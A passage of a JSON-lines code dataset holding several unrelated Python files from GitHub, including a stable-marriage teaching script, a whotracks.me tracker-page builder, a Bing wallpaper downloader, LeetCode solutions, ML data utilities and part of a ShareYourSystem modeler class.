self.get_preference_number(acceptor,pool_object.get_current_engagement(acceptor))): \n return True \n else:\n return False\n\n# Proposer Class :: holds the proposer preferences\nclass Proposer:\n def __init__(self, values):\n \"\"\"\n Construct the proposer preferences\n \"\"\"\n self.values = values\n\n def get_proposal(self,proposer,iteration):\n \"\"\"\n Return the acceptor value (proposal to try) for the proposer and iteration passed\n \"\"\"\n #return self.values.iloc[proposer,iteration]\n return self.values[proposer][iteration]\n\n# Create dummy data\nacceptors_table = [[1,2,3,4],[3,4,1,2],[4,2,3,1],[3,2,1,4]]\nproposers_table = [[2,1,3,4],[4,1,2,3],[1,3,2,4],[2,3,1,4]]\n\n# Instantiate the Acceptor and Proposer class\naccepter_object = Acceptor(acceptors_table)\nproposer_object = Proposer(proposers_table)\n\nprint(\"Acceptors Table:\", accepter_object.values)\nprint(\"Proposers Table:\", proposer_object.values)\n\n# Instantiate the pool class\npool_object = Pool(np.unique(acceptors_table))\nif debug: print(\"Pool Object:\", pool_object.get_all_engagements())\n\ndef stable_marriage():\n for iteration in range(len(proposers_table)):\n print(\"\\n Round:\", iteration+1)\n for proposer in range(len(proposers_table[iteration])):\n print(\"PROPOSAL:\", proposer+1, \"---->\", proposers_table[proposer][iteration]) \n \n if accepter_object.is_proposal_accepted(proposer_object.get_proposal(proposer,iteration),proposer+1): #if proposal is accepter\n if debug: print(\"PROPOSAL ACCEPTED\")\n pool_object.new_engagement(proposer_object.get_proposal(proposer,iteration),proposer+1)\n else:\n if debug: print(\"PROPOSAL FAILED\")\n print(\"ENGAGEMENTS:\", pool_object.get_all_engagements())\n\n if pool_object.is_complete():\n return pool_object.get_all_engagements()\n\nprint(\"\\n FINAL ENGAGEMENTS:\", stable_marriage())\n\n","repo_name":"jamesdhope/teaching-lecturing-resources","sub_path":"stableGroups.py","file_name":"stableGroups.py","file_ext":"py","file_size_in_byte":4616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7840877248","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom collections import Counter, defaultdict\nfrom datetime import datetime\nfrom statistics import mean\n\nfrom jinja2 import Markup\n\nfrom whotracksme.website.utils import print_progress\nfrom whotracksme.website.templates import (\n get_template,\n render_template,\n)\nfrom whotracksme.website.plotting.utils import arrow_style\nfrom whotracksme.website.plotting.colors import SiteCategoryColors\nfrom whotracksme.website.plotting.trackers import ts_trend\n\n\ndef prevalence(app):\n pages_change = abs(round((app['history'][-2]['reach'] - app['history'][-1]['reach'] ) * 100, 1)) if len (app['history']) > 1 else 0.\n pages_change_background_color, pages_change_color, pages_change_class = arrow_style(pages_change)\n\n domains_change = abs(round((app['history'][-2]['site_reach'] - app['history'][-1]['site_reach'] ) * 100, 1)) if len (app['history']) > 1 else 0.\n domains_change_background_color, domains_change_color, domains_change_class = arrow_style(domains_change)\n\n return {\n \"pages\": round(app['history'][-1]['reach'] * 100, 1),\n \"pages_change\": {\n \"value\": pages_change,\n \"background_color\": pages_change_background_color,\n \"color\": pages_change_color,\n \"class\": pages_change_class,\n },\n \"domains\": round(app['history'][-1]['site_reach'] * 100, 1),\n \"domains_change\": {\n \"value\": domains_change,\n \"background_color\": domains_change_background_color,\n \"color\": domains_change_color,\n \"class\": domains_change_class\n }\n }\n\n\ndef timeseries(app):\n ts = []\n page_reach = []\n site_reach = []\n for t in app[\"history\"]:\n page_reach.append(t.get(\"reach\"))\n ts.append(t.get(\"ts\"))\n site_reach.append(t.get(\"site_reach\"))\n\n # Make dates valid\n ts = [datetime.strptime(t, \"%Y-%m\") for t in ts]\n return ts, page_reach, site_reach\n\n\ndef tracking_methods(app):\n # Reducing values to booleans\n methods = {\n \"cookies\": False,\n \"fingerprinting\": False\n }\n if app.get(\"overview\", {}).get(\"cookies\") > 0.2:\n methods[\"cookies\"] = True\n if app.get(\"overview\", {}).get(\"bad_qs\") > 0.1:\n methods[\"fingerprinting\"] = True\n return methods\n\n\ndef presence_by_site_type(app, sites):\n categories = Counter(\n filter(lambda c: len(c) > 0,\n [sites.get(s['site'], {}).get('category', '') for s in app.get(\"sites\")]))\n if categories.items():\n normalized_categories = []\n total = sum(categories.values())\n for (k, v) in categories.items():\n if not k == '':\n normalized_categories.append((k, round(100 * (v / float(total)))))\n\n return sorted(normalized_categories, key=lambda x: x[1], reverse=True)\n return []\n\n\ndef similar_trackers(app, apps, n=4):\n sorted_trackers = sorted(apps.values(), key=lambda a: a['overview']['reach'], reverse=True)\n\n top_n = []\n for t in sorted_trackers:\n if len(top_n) > n:\n break\n t_subset = {}\n\n if t.get('cat') == app.get('cat') and t.get('overview', {}).get('id') != app.get('id'):\n t_subset['id'] = t['overview']['id']\n\n if 'company_id' in t:\n t_subset['company_id'] = t['company_id']\n top_n.append(t_subset)\n\n return top_n\n\n\ndef tag_cloud_data(aid, app, data):\n def get_site_frequency(site):\n site = data.sites.get(site, None)\n if site is None:\n return 0.\n for site_app in site['apps']:\n if site_app['app'] == aid:\n return site_app['frequency']\n\n sites_table = [{\n 'site': s['site'],\n 'frequency': s['frequency'],\n 'url': data.url_for('site', s['site'], path_to_root='..') if data.get_site_name(s['site']) is not None else None,\n 'site_freq': get_site_frequency(s['site']),\n 'site_cat': SiteCategoryColors.get(data.sites.get(s['site'], {}).get('category', '').strip(), '#000'),\n 'category': data.sites.get(s['site'], {}).get('category', '').strip()\n } for s in app.get('sites')]\n\n n_unlinked = len(list(filter(lambda s: s['url'] is None, sites_table)))\n # decide whether non-topsite sites should be included\n if len(sites_table) - n_unlinked > 30:\n sites_table = list(filter(lambda s: s['url'] is not None, sites_table))\n\n return sites_table\n\n\ndef sites_per_app_by_category(sites_table):\n sites_by_cat = defaultdict(list)\n for s in sites_table:\n sites_by_cat[s[\"category\"].strip()].append(s)\n return sites_by_cat\n\n\ndef tracker_header_stats(apps):\n cookies = []\n fingerpriting = []\n data = []\n for apid, app in apps.items():\n cookies.append(True if app.get(\"overview\", {}).get(\"cookies\") > 0.2 else False)\n fingerpriting.append(True if app.get(\"overview\", {}).get(\"bad_qs\") > 0.1 else False)\n data.append(app.get(\"overview\", {}).get(\"content_length\", 0))\n\n return {\n \"by_cookies\": sum(cookies)/len(cookies),\n \"by_fingerprinting\": sum(fingerpriting)/len(fingerpriting),\n \"data\": mean(data)\n }\n\ndef build_trackers_list(data):\n apps = data.apps\n\n sorted_trackers = sorted(apps.values(), key=lambda a: a['overview']['reach'], reverse=True)\n sorted_trackers_cat = sorted(\n apps.values(),\n key=lambda a: data.get_app_name(\n a['overview']['id']) if (\n 'company_id' not in a or\n a['company_id'] in [None, \"None\"])\n else a['company_id']\n )\n\n for tracker in sorted_trackers:\n if 'name' not in tracker:\n tracker['name'] = tracker['overview']['id']\n\n with open('_site/trackers.html', 'w') as output:\n output.write(render_template(\n template=get_template(data, name=\"trackers.html\"),\n tracker_list=sorted_trackers,\n trackers_list_cat=sorted_trackers_cat,\n header_stats=tracker_header_stats(data.apps)\n ))\n\n print_progress(text=\"Generate tracker list\")\n\n\ndef tracker_page(template, aid, app, data):\n if 'name' not in app:\n app['name'] = aid\n\n # Tracker Reach ts\n ts, page_reach, site_reach = timeseries(app)\n\n # page_reach trend line\n page_trend = Markup(ts_trend(ts=page_reach, t=ts))\n\n # domain_reach trend line\n site_trend = Markup(ts_trend(ts=site_reach, t=ts))\n\n methods = tracking_methods(app)\n\n # tag cloud data\n sites_table = tag_cloud_data(aid, app, data)\n sites_by_cat = sites_per_app_by_category(sites_table)\n\n # for horizontal bar chart in profile\n website_types = presence_by_site_type(app, data.sites)\n\n # similar trackers\n similar_tracker_list = similar_trackers(app, data.apps, n=4)\n\n # write to file\n with open('_site/{}'.format(data.url_for('app', aid)), 'w') as output:\n output.write(render_template(\n path_to_root='..',\n template=template,\n app=app,\n profile=app, # profile-card hack\n prevalence=prevalence(app),\n tracking_methods=methods,\n website_list=sites_table,\n sites_by_cat=sites_by_cat,\n website_types=website_types[:5], # top 3\n similar_trackers=similar_tracker_list,\n trends={\"page\": page_trend, \"site\": site_trend}\n ))\n\n\ndef build_tracker_pages(data):\n apps = data.apps\n template = get_template(data, name='tracker-page.html', path_to_root='..')\n\n for (aid, app) in apps.items():\n tracker_page(template, aid, app, data)\n\n print_progress(text=\"Generate tracker pages\")\n","repo_name":"valerymamontov/whotracks.me","sub_path":"whotracksme/website/build/trackers.py","file_name":"trackers.py","file_ext":"py","file_size_in_byte":7652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"3594093549","text":"import string\nimport random\nimport csv\n\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ['DVPD-'+''.join(random.choice(chars) for _ in range(size))]\n\ncsvfile=open('voucher.csv','w', newline='')\nobj=csv.writer(csvfile)\nfor x in range (0,99):\n obj.writerow(id_generator(12))\ncsvfile.close()","repo_name":"Maxwell39/dvoc_api","sub_path":"mockapi/core/voucher.py","file_name":"voucher.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42715040617","text":"import logging\nfrom os import environ\n\nlogger = logging.getLogger(\"AniList\")\nlogger.setLevel(logging.DEBUG if environ.get(\"DEV\") == \"true\" else logging.INFO)\n\nhandler = logging.StreamHandler()\nhandler.setFormatter(\n logging.Formatter(\n fmt=\"%(asctime)s [%(levelname)s] - %(name)s: %(message)s\", datefmt=\"%x %X\"\n )\n)\n\nlogger.addHandler(handler)\n","repo_name":"pxseu/anilist-readme","sub_path":"anilist_readme/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"33972995136","text":"import urllib.request, json\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"saveloc\", help=\"The location to save images to (eg. 'C:/users/images')\")\r\nparser.add_argument(\"--mkt\", help=\"The market the images are meant for (eg. en-CA)\")\r\nargs = parser.parse_args()\r\n\r\n#Change the market to get these images from if it was specified\r\nif args.mkt:\r\n url_str = \"\"\"https://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt={}\"\"\".format(args.mkt)\r\nelse:\r\n url_str = \"https://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt=en-CA\"\r\n\r\n\r\n#Download the images\r\nwith urllib.request.urlopen(url_str) as url:\r\n data = json.loads(url.read().decode())\r\n picture_url = data['images'][0]['url'];\r\n\r\n #The picture url looks like '/az/hprichbg/rb/Mellieha_EN-CA9931288836_1920x1080.jpg'\r\n #This line gets the part between ...rb/ and _EN-CA...\r\n picture_name = picture_url.split(\"/\")[4].split(\"_\")[0]\r\n\r\n #Download and save the image\r\n urllib.request.urlretrieve('https://www.bing.com' + picture_url,\r\n \"{}/{}.jpg\".format(args.saveloc, picture_name))\r\n","repo_name":"ConMur/PythonScripts","sub_path":"IOTD.py","file_name":"IOTD.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25543651484","text":"\"\"\" This class is only imported if windows OS is detected\r\n\"\"\"\r\n\r\nfrom gooey import Gooey, GooeyParser\r\n\r\n\r\n@Gooey()\r\ndef get_args_gooey():\r\n parser = GooeyParser(description='crc32 tool')\r\n parser.add_argument(\"path\", help=\"path to crc; or json file to read\", widget='FileChooser')\r\n parser.add_argument(\"-o\", \"--output\", default=None, help=\"save output json\")\r\n parser.add_argument(\"-r\", \"--read\", action=\"store_true\", default=False, help=\"reads a crc json file\")\r\n parser.add_argument(\"-R\", \"--recursive\", action=\"store_true\", default=False, help=\"recursivly scan folders\")\r\n parser.add_argument(\"-p\", \"--pretty-output\", action=\"store_true\", default=False)\r\n return parser.parse_args()\r\n","repo_name":"Eggertron/crcsum","sub_path":"windows_gui.py","file_name":"windows_gui.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3391146498","text":"\n\nclass Solution: #376 ms\n \n def minStickers(self, stickers: List[str], target: str) -> int:\n\n t_count = collections.Counter(target) \n A = [collections.Counter(sticker) & t_count for sticker in stickers]\n for i in range(len(A) - 1, -1, -1):\n if any(A[i] == A[i] & A[j] for j in range(len(A)) if i != j):\n A.pop(i) # goes from back to front so it's ok\n\n self.best=len(target)\n self.n=len(A)\n for c in target:\n found=False\n for s in stickers:\n if c in s:\n found=True\n break\n if not found:\n return -1\n \n \n def solve(used:int,i:int) -> int:\n # print(i)\n if i==self.n:\n if all(t_count[x]<=0 for x in t_count):\n self.best=min(self.best,used)\n return\n # print(stickers[i]+\" \"+str(used))\n if used >=self.best:\n return #early pruning\n sticker=A[i] # a counter\n x=max(t_count[letter] // sticker[letter]\n for letter in sticker)\n x=max(x,0)\n \n for c in sticker:\n t_count[c]-=x*sticker[c]\n print(c,sticker[c])\n solve(used+x,i+1)\n for j in range(x-1,-1,-1):\n for letter in sticker:\n t_count[letter]+=sticker[letter]\n solve(used+j,i+1)\n \n solve(0,0)\n return self.best\n\nclass Solution: # very slow, but used DFS\n \n def minStickers(self, stickers: List[str], target: str) -> int:\n def get_frq(target:str) -> List[int]:\n res=[0]*26\n for c in target:\n res[ord(c)-ord('a')]+=1\n return res\n self.frq=get_frq(target)\n # print(self.frq)\n self.best=len(target)\n self.n=len(stickers)\n for c in target:\n found=False\n for s in stickers:\n if c in s:\n found=True\n break\n if not found:\n return -1\n \n \n def solve(used:int,i:int) -> int:\n \n if i==self.n:\n if sum(self.frq)==0:\n print(\"END \"+str(used))\n self.best=min(self.best,used)\n return\n # print(stickers[i]+\" \"+str(used))\n if used >=self.best:\n return #early pruning\n sfrq=get_frq(stickers[i])\n \n x=0\n for j in range(26):\n if sfrq[j]==0:\n continue\n x=max(x,self.frq[j]//sfrq[j])\n \n for j in range(x,-1,-1):\n temp=self.frq.copy()\n for k in range(26): # appply this sticker j times\n self.frq[k]=max(0,self.frq[k]-j*sfrq[k])\n # print(\"applied \"+stickers[i]+\" \"+str(j)+\" times\")\n solve(used+j,i+1)\n self.frq=temp.copy()\n \n solve(0,0)\n return self.best\n\nclass Solution: #25% for python time, dp based on chars left\n def minStickers(self, stickers: List[str], target: str) -> int:\n self.dp={}\n self.frq=[0]*26\n n,best=len(target),len(target)\n for c in target:\n found=False\n for s in stickers:\n if c in s:\n found=True\n break\n if not found:\n return -1\n self.frq[ord(c)-ord('a')]+=1\n self.dp[\"\"]=0\n def get_id() -> string:\n res=\"\"\n for i in range(26):\n if self.frq[i]==0:\n continue\n res+= chr(i+ord('a'))+ str(self.frq[i])\n return res\n \n def solve() -> int:\n di=get_id()\n # print(di)\n if di in self.dp:\n return self.dp[di]\n res=15\n for s in stickers:\n temp=self.frq.copy()\n found=False\n for c in s:\n if self.frq[ord(c)-ord('a')]>0:\n self.frq[ord(c)-ord('a')]-=1\n found=True\n if not found:\n continue\n res=min(res,solve()+1)\n self.frq=temp.copy()\n self.dp[di]=res\n return res\n return solve()\n","repo_name":"apluscs/Leetcode","sub_path":"0691. Stickers to Spell Word.py","file_name":"0691. Stickers to Spell Word.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38303365302","text":"import torch\nfrom transformers import BertTokenizer\n\n\ndef get_tokens_from_sentences(sentences, tokenizer=None):\n if tokenizer is None:\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n\n # Tokenize all of the sentences and map the tokens to their word IDs.\n input_ids = []\n attention_masks = []\n\n for sentence in sentences:\n encoded_dict = tokenizer.encode_plus(\n sentence, # Sentence to encode.\n add_special_tokens=True, # Add '[CLS]' and '[SEP]'\n truncation=True,\n max_length=128, # Pad & truncate all sentences.\n padding='max_length',\n return_attention_mask=True, # Construct attn. masks.\n return_tensors='pt', # Return pytorch tensors.\n )\n\n input_ids.append(encoded_dict['input_ids'])\n attention_masks.append(encoded_dict['attention_mask'])\n\n # Convert the lists into tensors.\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n return input_ids, attention_masks, tokenizer\n","repo_name":"crisz/Thesis_explaining_bias","sub_path":"src/utils/huggingface.py","file_name":"huggingface.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32594144178","text":"import numpy as np\n\n\n\ndef shuffle_data(X, y, seed=None):\n \"\"\"Random shuffle of the samples in X and y\"\"\"\n if seed:\n np.random.seed(seed)\n idx = np.arange(X.shape[0])\n np.random.shuffle(idx)\n return X[idx], y[idx]\n\n\ndef batch_iterator(X, y=None, batch_size=64):\n \"\"\"Simple batch generator\"\"\"\n n_samples = X.shape[0]\n for i in np.arange(0, n_samples, batch_size):\n begin, end = i, min(i + batch_size, n_samples)\n if y is not None:\n yield X[begin:end], y[begin:end]\n else:\n yield X[begin:end]\n\n\ndef split_data_by_feature(dataset, feature_index, threshold):\n \"\"\"Divide dataset based on if sample value on feature index is larger than\n the given threshold\n\n Binarisation (partition logic) can be modified\n \"\"\"\n split_func = None\n if isinstance(threshold, int) or isinstance(threshold, float):\n print(\"split\", \"isinstance\")\n split_func = lambda sample: sample[feature_index] >= threshold\n else:\n print(\"split\", \"is not instance\")\n split_func = lambda sample: sample[feature_index] == threshold\n\n dataset_left = np.array([sample for sample in dataset if split_func(sample)])\n dataset_right = np.array([sample for sample in dataset if not split_func(sample)])\n\n return np.array([dataset_left, dataset_right])\n\n\ndef bootstrap_samples(X, y):\n \"\"\"Return random subsets with replacements of the data\"\"\"\n n_samples = X.shape[0]\n random_indexes = np.random.choice(n_samples, n_samples, replace=True)\n return X[random_indexes], y[random_indexes]\n\n\ndef train_test_split(X, y, test_size=0.5, shuffle=True, seed=None):\n \"\"\"Split the data into train and test sets\"\"\"\n if shuffle:\n X, y = shuffle_data(X, y, seed)\n # Split the training data from test data in the ratio specified in\n # test_size\n split_i = len(y) - int(len(y) // (1 / test_size))\n X_train, X_test = X[:split_i], X[split_i:]\n y_train, y_test = y[:split_i], y[split_i:]\n\n return X_train, X_test, y_train, y_test\n\n\ndef k_fold_cross_validation_sets(X, y, k, shuffle=True):\n \"\"\"Split the data into k sets of training / test data\"\"\"\n if shuffle:\n X, y = shuffle_data(X, y)\n\n n_samples = len(y)\n left_overs = {}\n n_left_overs = n_samples % k\n if n_left_overs != 0:\n left_overs[\"X\"] = X[-n_left_overs:]\n left_overs[\"y\"] = y[-n_left_overs:]\n X = X[:-n_left_overs]\n y = y[:-n_left_overs]\n\n X_split = np.split(X, k)\n y_split = np.split(y, k)\n sets = []\n for i in range(k):\n X_test, y_test = X_split[i], y_split[i]\n X_train = np.concatenate(X_split[:i] + X_split[i + 1 :], axis=0)\n y_train = np.concatenate(y_split[:i] + y_split[i + 1 :], axis=0)\n sets.append([X_train, X_test, y_train, y_test])\n\n # Add left over samples to last set as training samples\n if n_left_overs != 0:\n np.append(sets[-1][0], left_overs[\"X\"], axis=0)\n np.append(sets[-1][2], left_overs[\"y\"], axis=0)\n\n return np.array(sets)\n","repo_name":"Glebmaksimov/scratch_implemented","sub_path":"utils/data_manipulation.py","file_name":"data_manipulation.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71739163930","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\n@Date : Fri Nov 14 13:20:38 2014 \\n\n@Author : Erwan Ledoux \\n\\n\n\n\n\nJoiner instances helps to insert in Hierarchized databases, get the corresponding\nRetrieveIndexesLists if it was already inserted, and then insert locally\ndepending if it is a new row compared to all HierarchizedRetrieveIndexesListsList\n\n\"\"\"\n\n#\nimport ShareYourSystem as SYS\nBaseModuleStr=\"ShareYourSystem.Standards.Modelers.Joiner\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Classer\"\nSYS.setSubModule(globals())\n#\n\n#\nimport collections\nimport tables\n\nfrom ShareYourSystem.Functers import Imitater,Switcher\nfrom ShareYourSystem.Standards.Objects import Noder\n#\n\n#\n@DecorationClass()\nclass HierarchizerClass(BaseClass):\n\t\n\t#Definition\n\tRepresentingKeyStrsList=[\n\t\t\t\t\t\t\t\t\t'HierarchizingNodeStr',\n\t\t\t\t\t\t\t\t\t'HierarchizingDatabaseNodeStr',\n\t\t\t\t\t\t\t\t\t'HierarchizingDatabaseKeyStr',\n\t\t\t\t\t\t\t\t\t'HierarchizedNodeVariablesList',\n\t\t\t\t\t\t\t\t\t'HierarchizedDeriveDatabasersList',\n\t\t\t\t\t\t\t\t\t'HierarchizedKeyStrsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListColumnStrsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListGetStrsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedInsertIndexIntsList'\n\t\t\t\t\t\t\t\t]\n\n\t#@Hooker.HookerClass(**{'HookingAfterVariablesList':[{'CallingVariable':BaseClass.__init__}]})\n\tdef default_init(self,\n\t\t\t\t\t\t_HierarchizingNodeStr=\"Component\",\n\t\t\t\t\t\t_HierarchizingDatabaseNodeStr=\"\",\n\t\t\t\t\t\t_HierarchizingDatabaseKeyStr=\"\",\n\t\t\t\t\t\t_HierarchizedNodeVariablesList=None,\n\t\t\t\t\t\t_HierarchizedDeriveDatabasersList=None,\n\t\t\t\t\t\t_HierarchizedKeyStrsList=None,\n\t\t\t\t\t\t_HierarchizedRetrieveIndexesListColumnStrsList=None,\n\t\t\t\t\t\t_HierarchizedRetrieveIndexesListGetStrsList=None,\n\t\t\t\t\t\t_HierarchizedInsertIndexIntsList=None,\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\n\t\t#Call the parent init method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\t#@Hooker.HookerClass(**{\n\t#\t\t\t\t\t\t'HookingAfterVariablesList':[\n\t#\t\t\t\t\t\t\t{'CallingMethodStr':'join'},\n\t#\t\t\t\t\t\t\t{'CallingVariable':Featurer.FeaturerClass.model}\n\t#\t\t\t\t\t\t]\n\t#\t\t\t\t\t}\n\t#)\n\t@Switcher.SwitcherClass()\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\n\tdef model(self):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['HierarchizingNodeStr']))\n\t\t'''\n\n\t\t#\n\t\t#hierarchy first\n\t\tself.hierarchize()\n\t\t#\n\t\t\n\t\t#debug\n\t\t'''\n\t\tself.debug('Add in the ModelingDescriptionTuplesList')\n\t\t'''\n\t\t\n\t\t#set\n\t\tif len(self.HierarchizedRetrieveIndexesListColumnStrsList)>0:\n\t\t\tself.ModelingDescriptionTuplesList=map(\n\t\t\t\tlambda __HierarchizedRetrieveIndexesListGetStr,__HierarchizedRetrieveIndexesListColumnStr:\n\t\t\t\t(\n\t\t\t\t\t__HierarchizedRetrieveIndexesListGetStr,\n\t\t\t\t\t__HierarchizedRetrieveIndexesListColumnStr,\n\t\t\t\t\ttables.Int64Col(shape=2)\n\t\t\t\t),\n\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\tself.HierarchizedRetrieveIndexesListColumnStrsList\n\t\t\t)+self.ModelingDescriptionTuplesList\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['ModelingDescriptionTuplesList']))\n\t\t'''\n\n\t\t#\n\t\t#call the base model method then\n\t\tBaseClass.model(self)\n\t\t#\n\t\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t@Switcher.SwitcherClass()\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\n\tdef table(self):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t'HierarchizingNodeStr',\n\t\t\t\t\t\t\t\t]))\n\t\t'''\n\n\t\t#\n\t\t#database firstand hierarchy first\n\t\tself.database()\n\t\tself.hierarchize()\n\t\t#/\n\n\t\t#Check\n\t\tif self.HierarchizingNodeStr!=\"\":\n\n\t\t\t#structure first in the parent pointer and then table\n\t\t\tif self.NodePointDeriveNoder!=None:\n\n\t\t\t\t#Check\n\t\t\t\tif self.HdformatedFileVariable==None:\n\n\t\t\t\t\t#debug\n\t\t\t\t\tself.debug(\n\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t'We have to structure first'\n\t\t\t\t\t\t\t]\n\t\t\t\t\t\t)\n\n\t\t\t\t\t#structure by also tabling at the same time\n\t\t\t\t\tself.NodePointDeriveNoder.structure(\n\t\t\t\t\t\t**{\n\t\t\t\t\t\t\t'ParentingNodeStr':self.HierarchizingNodeStr\n\t\t\t\t\t\t}\n\t\t\t\t\t)\n\n\t\t\t\t\t#Table all the Hierarchized databasers and init the corresponding HierarchizedRetrieveIndexesList in the NodePointDeriveNoder\n\t\t\t\t\tself.NodePointDeriveNoder.update(\n\t\t\t\t\t\tzip(\n\t\t\t\t\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\t\t\t\t\tmap(\n\t\t\t\t\t\t\t\t\tlambda __HierarchizedDeriveDatabaser:\n\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t__HierarchizedDeriveDatabaser.table(\n\t\t\t\t\t\t\t\t\t\t\t).TabledInt,\n\t\t\t\t\t\t\t\t\t\t-1\n\t\t\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t\t\tself.HierarchizedDeriveDatabasersList\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t)\n\n\t\t\n\t\t#\n\t\tBaseClass.table(self)\n\t\t#\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\t\n\tdef row(self):\n\n\t\t#\n\t\t#table first\n\t\tself.table()\n\t\t#\n\n\t\t#set\n\t\tself.HierarchizedInsertIndexIntsList=map(\n\t\t\t\t\tlambda __HierarchizedDeriveDatabaser:\n\t\t\t\t\t__HierarchizedDeriveDatabaser.row().RowedIndexInt,\n\t\t\t\t\tself.HierarchizedDeriveDatabasersList\n\t\t\t\t)\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t'RowedHierarchyInsertIndexIntsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListGetStrsList'\n\n\t\t\t\t\t\t\t\t]))\n\t\t'''\n\n\t\t#set the modeled int in the retrieve tuples\n\t\tmap(\n\t\t\t\tlambda __HierarchizedRetrieveIndexesListGetStr,__RowedHierarchyInsertIndexInt:\n\t\t\t\tgetattr(\n\t\t\t\t\tself.NodePointDeriveNoder,\n\t\t\t\t\t__HierarchizedRetrieveIndexesListGetStr\n\t\t\t\t\t).__setitem__(\n\t\t\t\t\t\t1,\n\t\t\t\t\t\t__RowedHierarchyInsertIndexInt\n\t\t\t\t),\n\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\tself.HierarchizedInsertIndexIntsList\n\t\t\t)\n\t\n\n\t\t#debug\n\t\t'''\n\t\tself.debug([\n\t\t\t\t\t\t('Before updating the RowingKeyStrsList'),\n\t\t\t\t\t\t#('self.',self,['NodePointDeriveNoder'])\n\t\t\t\t\t\t('model first to set the ModeledGetStrToColumStr')\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['RowingKeyStrsList']))\n\t\t'''\n\n\t\t#Add in the RowingKeyStrsList\n\t\tself.RowingKeyStrsList=self.HierarchizedRetrieveIndexesListGetStrsList+self.RowingKeyStrsList\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t\t\t[\n\t\t\t\t\t\t'Now row with Featurer',\n\t\t\t\t\t\t('self.',self,['RowingKeyStrsList'])\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#\n\t\t#row then\n\t\tBaseClass.row(self)\n\t\t#\n\n\t\t#debug\n\t\t'''\n\t\tself.debug('Ok row is over for hierarchizing')\n\t\t'''\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t#@Argumenter.ArgumenterClass()\n\t@Imitater.ImitaterClass()\n\tdef insert(self):\n\t\t\t\t\n\t\t#\n\t\t#row first\n\t\tself.row()\n\t\t#\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t\t\t[\n\t\t\t\t\t\t'First make insert the Hierarchized databases',\n\t\t\t\t\t\t('self.',self,['HierarchizedNodeVariablesList'])\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#Insert the Hierarchized databases\n\t\tself.HierarchizedInsertIndexIntsList=map(\n\t\t\t\t\tlambda __HierarchizedDeriveDatabaser:\n\t\t\t\t\t__HierarchizedDeriveDatabaser.insert(),\n\t\t\t\t\tself.HierarchizedDeriveDatabasersList\n\t\t\t\t)\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t\t\t[\n\t\t\t\t\t\t'First make insert the Hierarchized databases',\n\t\t\t\t\t\t('self.',self,['HierarchizedNodeVariablesList'])\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t'''\n\n\t\t#debug\n\t\t'''\n\t\tself.debug('Now we can insert')\n\t\t'''\n\n\t\t#\n\t\t#insert 